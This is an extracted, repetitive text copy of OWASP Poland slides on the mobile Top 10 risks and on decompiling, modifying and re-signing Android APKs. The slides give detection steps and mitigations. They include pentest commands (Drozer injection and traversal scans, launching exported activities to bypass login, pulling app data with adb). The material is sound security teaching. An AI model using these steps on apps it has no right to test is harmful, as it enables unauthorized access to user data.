bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
